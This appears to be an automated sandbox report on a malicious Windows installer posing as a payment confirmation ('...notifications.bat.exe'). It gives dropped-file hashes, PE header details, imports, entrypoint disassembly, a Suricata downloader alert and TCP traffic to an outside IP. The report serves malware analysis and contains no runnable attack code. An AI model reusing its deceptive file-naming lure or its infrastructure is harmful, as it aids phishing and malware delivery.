Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L...S.d...........!....."..................@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet\bttefulde.tox

Download File

Process:	C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe
File Type:	DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 8589934592.000000
Category:	dropped
Size (bytes):	267655
Entropy (8bit):	1.2559804952290619
Encrypted:	false
SSDEEP:	768:HbUhrUe+zlum+LaFrAX40edupFSsZVfeTkVhbbCGx6+ZOoJrrSVlRM9k8rZgQWze:ICFg/VP97pb14sZg
MD5:	F6A4342C9271CFFEF29695EEA330941E
SHA1:	291ABCFA507BA730832511E5F47EAA2CB4DFABBD
SHA-256:	605B31C886C5989625152D1CD58BCACF2827DE36CC67B5D94D6B425955CEDBA6
SHA-512:	D839DD8E3D74B7500F32318403BEAC3BA2DA83C48EF21555E78D368AA0404AC750DB1DD7EB8A7196DA32FBE3D880B66ED3166A39F17D8D0D13C9C4B19435530C
Malicious:	false
Preview:	...........T.........'......'....A........s.................@.....................................................................N......M...........^................................t............Q.......R...r.........................................................6..................Q...I........<....d......................................................................................B.....p............/.........................................."...b..@...................Q...........!.................................f............................`.................d.................................L.........f...o....................................................................................s...................i.....................S.b..A...............................................................U..o................................................................../...............................................................................................`..................

C:\Users\user\eftermodnendes\ringeagt\Respecialisters\Daystars216.tre

Download File

Process:	C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	114454
Entropy (8bit):	1.2519787240577294
Encrypted:	false
SSDEEP:	768:RRDt23AKhN87PfNufvVxTfdx5U5Flf6VAETw:YEevVx2h
MD5:	F85E20AA1A28EEFFC89F744F6B6B67B3
SHA1:	B61AEF131017C5605647983CE2D55769914BB104
SHA-256:	C388ED22B7E44C0C3FDD6D064DD070DCA64CEA1E83D6151566641E7438C346ED
SHA-512:	EA89503F496B30DA5EAA74BB479007BB6B93463B775F16810A4391E79389A219398AC81DCCDD79C3F60E85DF77AA985E405BDF7B477C8F3217ECC3B7460BEE6A
Malicious:	false
Preview:	...............................m.......................5............}.......t......^..................................................)..........................................;......B.......................................................................*....................3.......s.......................+.+...@=.......O..........................G...................M...........g...................#.........................................................................................................v......................e........n......,...................b.................................e.................Y.......=..........................................................a........j.../.........#..........................`..................................>........\..................................... ..................................................g..R.........................................................................g...............................N....................

C:\Users\user\eftermodnendes\ringeagt\Respecialisters\Skvinge18.alt

Download File

Process:	C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	310550
Entropy (8bit):	1.2527719188567612
Encrypted:	false
SSDEEP:	1536:CfvXvtPDO00Rz1DXs2sASdJwvyfnpZkL:klDO0MDRS9k
MD5:	72FA348549D0BD9CE66E5F3EBA54DF3A
SHA1:	D5B4797D07374226CD8173964DF8753F4ABB9E6E
SHA-256:	7F24A44B47D2C036AACE03D4F5EBEA053CED6ED06CE01ED70E6FD8AEE8211CC9
SHA-512:	D375FC28BBA68A52E4C2CB97A9ADA416D38F29B21004F1853DC14ACF28CDE2A802D51FD66901D993DAA58E50D8C87FD2A8827482633B0B9874FF64F8442492B1
Malicious:	false
Preview:	...e......J.........................................................................................................................................J........K...............................L...........................v.............................................................................%..:...................F.................................................................\|...1.....A..................................1........d...................J..X..........................x..............x..."..........................`.........................................................[...................t.......................2..............................................................................t....................................................$...\...............!..........................\|....................................r.............................W.............................................X.....................................................q.................

C:\Users\user\eftermodnendes\ringeagt\Respecialisters\Vaelger.Abr

Download File

Process:	C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	83152
Entropy (8bit):	4.590487128538397
Encrypted:	false
SSDEEP:	1536:mPpv9Hyk6GJxFF88oQTFd5xzmxgxAVH3r2gnnAOpuIg:mPpvdys0xQT/5m9SJEuIg
MD5:	3B9A97DDA581FFCEB29B192F228D66DF
SHA1:	A11D7ADCC7A283B75D217A27724324F53FB91540
SHA-256:	F783B047374C53913141CAFDE79B94B7C0D3AEA69AE86EA4417D7C8EB7798529
SHA-512:	13BD775B3FF31F2127C28D26942DE8235EFE96AF4E2A921DBD82C813B53167E7B3E331A7F45178A77E65C2EF9CDA0D25DEAD6C775FFEC0F0E8CAD45DCB0DDF7E
Malicious:	false
Preview:	..UU...........K....]]]]]...FF...6.........g....++.....D.....;.s.:..//..d..O....AAA....=._...........;;;..........W............................888.......L.....CCC...............66..../..........vvv.........q..................C....<<<..................e..............-......qq..*.D.......00...%....""".======.#........................................'.........C.........UU..............L...^.......+............222.333.kkk.MMMMMMMMMM....................Q............ll.........hh.........ss.......>.........E......%%%..........................MM.................................... ...........:...........................Y.................[................................ ...........55555......<<<<.?.........//....D.Y.$$.............I..%.....................-..zz..sss.......=.........333.................KK.........JJ...................R...'.....................X..9....XXXXXXXXX.Z.......S...S......I...77.............eeeee....w...................................................v..gg.....222.

C:\Users\user\eftermodnendes\ringeagt\Respecialisters\gramaries.Ove

Download File

Process:	C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	295959
Entropy (8bit):	7.608537202687179
Encrypted:	false
SSDEEP:	6144:WH4o5aBQ0lz5DJimagdvhT7lmfp8Fpzkc1PlKQl4ZPIxo4+V6GVS2paf:WYo2Z5DAmaghhFm2YqtP4lIxgBVLpaf
MD5:	5B2D5C7C1482936796C2699166B34424
SHA1:	493E890B6548A54DDADB5D450797BBE68429502C
SHA-256:	A7C9A3BE29FACF27782B90B0E6EE7D6B645CD7F827C6475BFD19A6480D0890EA
SHA-512:	3983BFC12B10AB6C26BF3D070CAA9960C6F6DF07D48BB27318C984BD2CA56CF310050E0ED40A8E11E284B70413B01773DF7F5178216953AF5A5E47E4F7A89368
Malicious:	false
Preview:	.#............H.......................xxx.$............@..W.......dd..............................dddd...MM.........qq...........u.....PP...............A.............!!!.```.....BBBBBBB.999..........+......................X.n.....11.g........W.........y.....fff....-.........,..<<<....s........EEE........................AAA...w.CCC.......j.......^.!.w...ZZZZZZ....................................._.....___.............@@..........................ww...uuuuuu.C..............f...22..........E.:...........4..-......e.........ww...<<<<. ...........................B..f.....TT.7777..............www.....T.cc..xx.`....f..33...I...<<<<....tttt........Q...J.......................000..&.TT......==......A........jjj..M.ss........BBB.....DD.~~.........LLLLL.C.,..........r..........EE......................;........gg.....????..M.*.............==.....b..............J................................cc.............Y.U....E.....yyy.. ....AA..C......=....qqqqqq..............K.llll......bbb...@.?..........

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.712228071105721
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe
File size:	550'217 bytes
MD5:	25eec63edf7c0eb8628a89712b5cb363
SHA1:	4e8d586a950492c30147b7d56bcfad49cd577966
SHA256:	e075807417590255de4d395fa3dfbc336e88c96bbab8afca1d5e5d5abbac0237
SHA512:	086feb119e2a02f2fd7afc45c422f9b472f049eb2e79f83769f25254d88a84086275d2cff1e891d360ea57978292cd0caf958e4000cd659ac532165e1f881dfb
SSDEEP:	6144:UnPdudwDCVOCg2G4A+uxXCpzna3MSzy99s5sbro5kd+B4hJ1QQsSGuhkrpzOUlec:UnPdMg2H8SpzaThHy7mzOUlvnVMs3e+
TLSH:	D9C4F1E4E210C1A7E25F5D38DAB169F11D80BC38D1E1087B43507EA9F4B2A2599EF91F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN._...PN..PO.JPN._...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...g..d.................h...".....

File Icon


Icon Hash:	4571753721719a8d

Static PE Info

General

Entrypoint:	0x403645
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x64A0DC67 [Sun Jul 2 02:09:43 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	9dda1a1d1f8a1d13ae0297b47046b26e

Entrypoint Preview

Instruction
sub esp, 000003F8h
push ebp
push esi
push edi
push 00000020h
pop edi
xor ebp, ebp
push 00008001h
mov dword ptr [esp+20h], ebp
mov dword ptr [esp+18h], 0040A230h
mov dword ptr [esp+14h], ebp
call dword ptr [004080A0h]
mov esi, dword ptr [004080A4h]
lea eax, dword ptr [esp+34h]
push eax
mov dword ptr [esp+4Ch], ebp
mov dword ptr [esp+0000014Ch], ebp
mov dword ptr [esp+00000150h], ebp
mov dword ptr [esp+38h], 0000011Ch
call esi
test eax, eax
jne 00007FA50493272Ah
lea eax, dword ptr [esp+34h]
mov dword ptr [esp+34h], 00000114h
push eax
call esi
mov ax, word ptr [esp+48h]
mov ecx, dword ptr [esp+62h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [esp+0000014Eh], 00000004h
not eax
and eax, ecx
mov word ptr [esp+00000148h], ax
cmp dword ptr [esp+38h], 0Ah
jnc 00007FA5049326F8h
and word ptr [esp+42h], 0000h
mov eax, dword ptr [esp+40h]
movzx ecx, byte ptr [esp+3Ch]
mov dword ptr [00429B18h], eax
xor eax, eax
mov ah, byte ptr [esp+38h]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [esp+00000148h]
movzx ecx, cx
shl eax, 10h
or eax, ecx
movzx ecx, byte ptr [esp+0000004Eh]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x84fc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4a000	0x18858	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2a8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x66b7	0x6800	e65344ac983813901119e185754ec24e	False	0.6607196514423077	data	6.4378696011937135	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1358	0x1400	bd82d08a08da8783923a22b467699302	False	0.4431640625	data	5.103358601944578	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x1fb78	0x600	caa377d001cfc3215a3edff6d7702132	False	0.5091145833333334	data	4.126209888385862	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2a000	0x20000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x4a000	0x18858	0x18a00	73bbe3fdd1585fbd610b24874590b455	False	0.22416322969543148	data	5.2980000367452575	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x4a418	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.14908908079971608
RT_ICON	0x5ac40	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.27520746887966807
RT_ICON	0x5d1e8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.3553001876172608
RT_ICON	0x5e290	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2688	English	United States	0.48667377398720685
RT_ICON	0x5f138	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.43934426229508194
RT_ICON	0x5fac0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152	English	United States	0.569043321299639
RT_ICON	0x60368	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 672	English	United States	0.5552995391705069
RT_ICON	0x60a30	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1536	English	United States	0.18841463414634146
RT_ICON	0x61098	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320	English	United States	0.4869942196531792
RT_ICON	0x61600	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.598404255319149
RT_ICON	0x61a68	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.26344086021505375
RT_ICON	0x61d50	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 384	English	United States	0.3094262295081967
RT_ICON	0x61f38	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	United States	0.42905405405405406
RT_DIALOG	0x62060	0x100	data	English	United States	0.5234375
RT_DIALOG	0x62160	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x62280	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x622e0	0xbc	data	English	United States	0.601063829787234
RT_VERSION	0x623a0	0x174	data	English	United States	0.5860215053763441
RT_MANIFEST	0x62518	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
ADVAPI32.dll	RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
SHELL32.dll	SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
ole32.dll	CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll	MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
GDI32.dll	GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
KERNEL32.dll	RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, WriteFile, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, CopyFileW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-14T16:35:30.624887+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.5	49977	109.99.162.14	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2025 16:35:29.082701921 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:29.082755089 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:29.082838058 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:29.097731113 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:29.097747087 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:30.028521061 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:30.029311895 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:30.394810915 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:30.394834995 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:30.395183086 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:30.395240068 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:30.398261070 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:30.439338923 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:30.624680996 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:30.624708891 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:30.624742031 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:30.624756098 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:30.624788046 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:30.624830008 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:30.743830919 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:30.743912935 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:30.744188070 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:30.744251966 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:30.745202065 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:30.745260000 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:30.746368885 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:30.746428013 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:30.863898039 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:30.863955021 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:30.863980055 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:30.863996983 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:30.864016056 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:30.864032984 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:30.864432096 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:30.864489079 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:30.865168095 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:30.865225077 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:30.865853071 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:30.865916967 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:30.866655111 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:30.866712093 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:30.867532015 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:30.867583990 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:30.983086109 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:30.983172894 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:30.983381033 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:30.983441114 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:30.983911991 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:30.983978987 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:30.984388113 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:30.984446049 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:30.984643936 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:30.984704971 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:30.985331059 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:30.985392094 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:30.985595942 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:30.985651970 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:30.985804081 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:30.985857964 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:30.986104965 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:30.986160994 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:30.986377954 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:30.986433029 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:30.987030029 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:30.987081051 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:30.987189054 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:30.987245083 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:30.987410069 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:30.987462044 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.073672056 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.073710918 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.073812962 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.073844910 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.073863029 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.077451944 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.102762938 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.102858067 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.103154898 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.103337049 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.103419065 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.103481054 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.103693962 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.103749037 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.103908062 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.103966951 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.104160070 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.104221106 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.104497910 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.104547977 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.108004093 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.108066082 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.108272076 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.108326912 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.108485937 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.108573914 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.111912966 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.111974001 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.112112045 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.112170935 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.112431049 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.112489939 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.112723112 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.112776995 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.112958908 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.113010883 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.164304018 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.164426088 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.164519072 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.164577007 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.193253994 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.193296909 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.193350077 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.193386078 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.193404913 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.193465948 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.193521976 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.193530083 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.193572044 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.193634033 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.193686962 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.193876028 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.193927050 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.194165945 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.194215059 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.194407940 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.194451094 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.194693089 CET	443	49977	109.99.162.14	192.168.2.5
